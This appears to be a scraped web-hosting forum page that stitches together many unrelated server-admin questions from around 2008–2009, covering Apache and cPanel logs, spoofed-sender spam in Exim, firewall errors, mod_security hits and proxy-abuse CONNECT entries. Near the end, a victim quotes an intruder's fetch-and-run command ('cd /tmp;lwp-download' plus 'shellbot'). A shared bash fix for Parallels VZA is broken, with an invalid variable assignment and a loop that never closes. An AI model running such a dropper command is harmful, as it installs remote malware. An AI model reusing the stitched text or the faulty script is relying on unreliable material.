I just discovered this completely by accident on my new vps
visits (via apache) from 10.16.x.x and 10.28.x.x
These aren't backups but actual website visits.
What on earth is going on? Is my host browsing my website though their network?
Their behavior seems harmless but I just want to make sure this is not a security issue with a neighbor somehow doing something.
I've just taken a look at the raw apache logs on my cpanel machine here:-
/usr/local/cpanel/logs/access_log
And there are many hundreds of these:-
127.0.0.1 - - [06/03/2008:21:55:22 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:21:55:22 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:03:42 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:03:42 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:12:02 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:12:02 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:20:22 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:20:22 -0000] "GET / HTTP/1." 401 0 "" ""
what is happening to my server to generate these log entries?
I have mod_security setup in WHM and am seeing a lot of these entries for various IP's.
Access denied with code 406 (phase 1). Match of "rx ^((?:(?:POS|GE)T|OPTIONS|HEAD))$" against "REQUEST_METHOD" required. [id "960032"] [msg "Method is not allowed by policy"] [severity "CRITICAL"]
How can I extract a list of visitor ip addresses from apache logs for a cpanel account?
are there any tools that will do a whois lookup for all the IP's?
Some VPS providers offering 2 and some are giving 4 IP private addresses.
Do we need private IP for setting up Name Servers? Is 2 private IPs enough for one reasonably big site with private name servers, email, etc.?
I'm trying to figure out a method to stop some of the email spam that we get, and I have something figured out, but I need help on implementing it.
Basically, we get a lot of spam emails from addresses claiming to be from our domain (EX: From: someguy@mysite.com). The email is actually not from our domain, nor does the address actually exist, but the From address is being forged to look like it is our domain.
Basically to fix this, i want to block all email where the From address is claiming to be from our domain, with a nonexistent email address. I'm pretty sure that this is configurable in Exim, but I haven't found any tutorial on it, and I'm not familiar enough with Exim to do it very easily. Anyway if anyone knows of a tutorial or how this could be accomplished, please let me know.
Just to Add:
The reason that these emails are a problem is that the spam software we are running recognizes these emails as being from our domain which it trusts, so they pass most spam filters.
is it possiable to delete these files in the server access_logs and errors_logs
View 1 Replies View RelatedI am currently with the planet and am happy with them, however as part of a new venture I need to gather a list of hosts as well as the planet that will be able to cater to the ventures needs and go to tender with the requirements.
ThePlanet offer something called a virtual rack. This is cheaper than renting a dedicated rack, allows for Gb networking but doesnt not allow for a SAN. Do other providers offer something similar? The cost of putting a machine on the virtual rack is not that much more expensive than just renting the machine. I guess there isn't too much to these set-ups to be fair.
If not, then we are looking for dedicated racks, with the ability to host a SAN at some point, but starting off with say 3 servers (2 web servers, 1 storage server with raid5 6Tb of hdd). These servers will be dealing with network cameras although I don't think that many will be streaming at once but the network capacity does need to be there.
Who's door should I be knocking on to find out some prices?
One final thing, should I bother looking for co-lo providers as well? We are in the Uk but not precious about our host being in the same country at all (it would be nice but uk prices are ££). Really, all we would be able to do with co-lo is buy the hardware outright to save price as we are not interested in looking after the hardware.
If you run into the fun error of Parallels VZA not showing your vps's
might try this
Code:
#
# Compatability fix for the vza from pim to vza
# Nicholas Rose nick.rose@nobistech.net
#
#updatedb
for i in `locate /ve.conf`; do
$vehost=`cat $i | grep HOSTNAME | grep HOSTNAME | awk -F '"' '{print $2}'`
sed -i 's/VE_TYPE="regular"//g' $i
echo 'VE_TYPE="regular"' >> $i
echo 'I just fixed '`cat $i | grep HOSTNAME | grep HOSTNAME | awk -F '"' '{print $2}'`
i try to install a vpn server on my vps ...
View 6 Replies View RelatedThe vps has
256MB(512 burstable) of memory
10GB of HardDisk space
Using Lighttpd, PHP and MySQL
ControlPanel is LXAdmin
top - 05:59:24 up 36 min, 1 user, load average: 0.42, 0.60, 0.62
Tasks: 31 total, 1 running, 29 sleeping, 0 stopped, 1 zombie
Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 1048576k total, 55216k used, 993360k free, 0k buffers
Swap: 0k total, 0k used, 0k free, 0k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 15 0 1964 660 568 S 0 0.1 0:00.46 init
3922 root 15 0 7824 2104 1720 S 0 0.2 0:00.01 sshd
9868 root 15 0 2352 1272 1064 S 0 0.1 0:00.00 bash
11693 root 18 0 2104 1020 820 R 0 0.1 0:00.10 top
17861 root 16 0 1632 620 520 S 0 0.1 0:00.00 syslogd
17918 dbus 25 0 2636 468 328 S 0 0.0 0:00.00 dbus-daemon
17955 root 18 0 5116 956 644 S 0 0.1 0:00.00 sshd
18093 tinydns 18 0 1544 304 252 S 0 0.0 0:00.00 tinydns
18106 root 23 0 1596 372 308 S 0 0.0 0:00.00 tcpserver
18131 apache 18 0 8452 4276 812 S 0 0.4 0:02.27 lighttpd
18132 admin 15 0 38704 24m 6652 S 0 2.4 2:58.37 php-cgi
18224 addons 20 0 22024 8456 4572 S 0 0.8 0:00.01 php-cgi
18278 root 15 0 2348 1112 968 S 0 0.1 0:00.00 sh
19519 root 15 0 4032 1432 1172 S 0 0.1 0:00.00 lxadmin.exe
19557 root 17 0 2608 884 712 S 0 0.1 0:00.00 xinetd
19594 lxlabs 18 0 5364 2220 1160 S 0 0.2 0:00.13 lxadmin.httpd
19879 root 18 0 2344 1124 964 S 0 0.1 0:00.00 mysqld_safe
19921 mysql 15 0 13688 5240 3904 S 0 0.5 0:17.51 mysqld
20250 qmails 15 0 1804 476 372 S 0 0.0 0:00.00 qmail-send
20256 qmaill 18 0 1564 472 404 S 0 0.0 0:00.00 splogger
20260 root 22 0 1576 344 268 S 0 0.0 0:00.00 qmail-lspawn
20261 qmailr 15 0 1572 372 296 S 0 0.0 0:00.00 qmail-rspawn
20275 qmailq 18 0 1560 352 284 S 0 0.0 0:00.00 qmail-clean
21824 root 18 0 6200 1296 960 S 0 0.1 0:00.00 authdaemond
21828 root 15 0 1596 376 312 S 0 0.0 0:00.00 tcpserver
21834 root 25 0 1592 368 308 S 0 0.0 0:00.00 tcpserver
21838 root 18 0 6200 460 124 S 0 0.0 0:00.00 authdaemond
21842 root 18 0 1592 372 312 S 0 0.0 0:00.00 tcpserver
21861 root 25 0 1592 368 308 S 0 0.0 0:00.00 tcpserver
21890 root 18 0 3184 1108 576 S 0 0.1 0:00.00 crond
I just got an email from my vps saying that a BFD attack was stopped and the ip was banned after 40 failed attempts of logging into ftpdpro. I logged in and started looking around and I noticed that in my apf log file there was:
Code:
Jan 15 00:54:07 s1 apf(22290): {glob} firewall initalized
Jan 15 00:54:07 s1 apf(22290): {glob} fast load snapshot saved
Jan 15 00:58:06 s1 apf(32425): {glob} uptime less than 5 minutes, going full load
Jan 15 00:58:06 s1 apf(32425): {glob} activating firewall
Jan 15 00:58:06 s1 apf(32500): {glob} unable to load iptables module (ip_tables), aborting.
Jan 15 00:58:06 s1 apf(32425): {glob} firewall initalized
Jan 15 00:58:06 s1 apf(32425): {glob} fast load snapshot saved
Jan 15 01:00:04 s1 apf(3950): {glob} uptime less than 5 minutes, going full load
My concern is that it says "unable to load iptables module (ip_tables), aborting.
is there anything that logs server load and what processes have caused any spikes?
one of my servers keeps going down under high load, well it seems to lock up and the noc has to reboot, but ofcourse the techs can't diagnose a problem after as it runs fine and when i send them a ticket it's because the server can't be reached at all and then they can't diagnose it either
I've just did the following on Ubuntu Server 9.03:
Code:
sudo apt-get install mysql-server
sudo apt-get install apache2
sudo apt-get install php5
sudo apt-get install php5-mysql
sudo apt-get install phpmyadmin
But when I say [url]-- it cannot be found..
I tried [url]as well, It cannot be found either.
i recently installed CentOS 5.1 with some new hardware.
After installation when i type free in SSH the total amount of RAM shows as: 3359580
I have two brand new Corsair 2GB modules installed.
Is this normal?
How would I set up Bandmin to show the extra 5 IP's that I just added ?
It shows stats for the main shared IP, but isn't for the 5 new ones that I added via WHM.
Help plz.....
(these IP's are not assigned to any domains, as they are just used for downloads)
Whenever i try to connect to ftp through any of my server account then its not showing any directory inside public_html but when i use cpanel file manager then its working fine i also tried to used differect ftp client program but still problem not solve will any of you help me? ftp successfully connected but not showing files and folders .
View 3 Replies View RelatedI have a VPS and am looking for a way to show existing and potential clients the uptime levels of the server. I have a basic uptime page provided by WHMCS, but I want to go a little beyond that.
If I were to choose an uptime reporting service such as siteuptime.com, hyperspin.com or site24x7.com, what would you recommend that I monitor? Obviously HTTP, FTP, POP3 and MySQL, but anything else? Do these services monitor the server load also?
Also, is it a good idea to display these stats publicly?
I moved a domain of mine from one of my CentOS servers on my SoHo LAN, to one of my CentOS cPanel/WHM servers. Since the SoHo machine had been handling this domain's mail for almost 2 years (300+ mb of mail), I decided to continue running it from home.
The Apache daemon was stopped on said SoHo box following DNS propagation to the cPanel machine, but Apache was automatically started again after having to reboot the SoHo server. Before I got a chance to kill Apache, I got some weird entries showin' up in the access_logs.
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:30:20 -0700] "CONNECT 205.188.179.233:443 HTTP/1.0" 302 286 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:37:05 -0700] "CONNECT 205.188.176.230:443 HTTP/1.0" 302 286 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:43:30 -0700] "CONNECT 205.188.153.99:443 HTTP/1.0" 302 285 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [16/Apr/2009:00:10:01 -0700] "CONNECT 205.188.153.100:443 HTTP/1.0" 302 286 "-" "-"
I ask simply because I don't recall seeing a "CONNECT" entry in my logs before, and I've been at this for awhile. That or I've just not paid any attention. And what's with the SSL port?
I guess I'm just a little confused as to what was trying to be accomplished here...it hasn't returned since.
Can we delete sql logs ? as it occupies 2.97gb
All the log is under a single file, occupying huge amount of space on our server
use lxadmin for the vps
we are unable to even open up the file, as we have almost run out of space, we would atleast like to delete around old logs older than a month, this logs are from 3 months, so please help us in solving this problem
if we delete the sql log, will a new log be created automatically or it gives an error?
if redhat keeps a log of ip addresses which have logged into the server.
Ive got a machine that one of my staff logged into today with the root account, and im wondering if I can find out the ip address of the user who logged in as root?
How can I check the logs to see if there are any errors? Can I check this via WHM?
View 6 Replies View RelatedI think my apache is killing my servers with crazy overload with logs... how do I turn this off?
View 2 Replies View RelatedI have recently started a forum and am wondering where I should locate the error logs for such things as database backups and failed admin panel login attempts.
There is the public_html folder, but I'm concerned that Anything contained within this folder is accessible to prying eyes. Is this true?
I have also heard of directory traversal, which I imagine could fall under the same category.
Would I perhaps be best off creating a folder outside of public_html for the holding of these valuable 'targets'?
What would I best to do to secure my server in this regard? It would have to be writeable for the system to be operational.
how do we view boot up logs to see what errors you're getting?
View 2 Replies View Relatedwhy this is happening?
Feb 22 04:58:31 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Feb 22 04:58:32 la1092 kernel: ata2: status=0x50 { DriveReady SeekComplete }
Feb 22 04:58:32 la1092 kernel: Info fld=0x2d7e, Current sdb: sense key No Sense
Feb 22 04:58:32 la1092 kernel: ata1: command 0xc8 timeout, stat 0x50 host_stat 0x24
Feb 22 04:58:32 la1092 kernel: ata1: status=0x50 { DriveReady SeekComplete }
Feb 22 04:58:32 la1092 kernel: Info fld=0x4632f99, Current sda: sense key No Sense
Feb 22 04:58:32 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Current setup is nginx, lighttpd and apache as web servers.
I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code:
hubberfix
sh -c cd /tmp;lwp-download [url]
shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
Where are MySQL logs stored on apache?
View 3 Replies View Related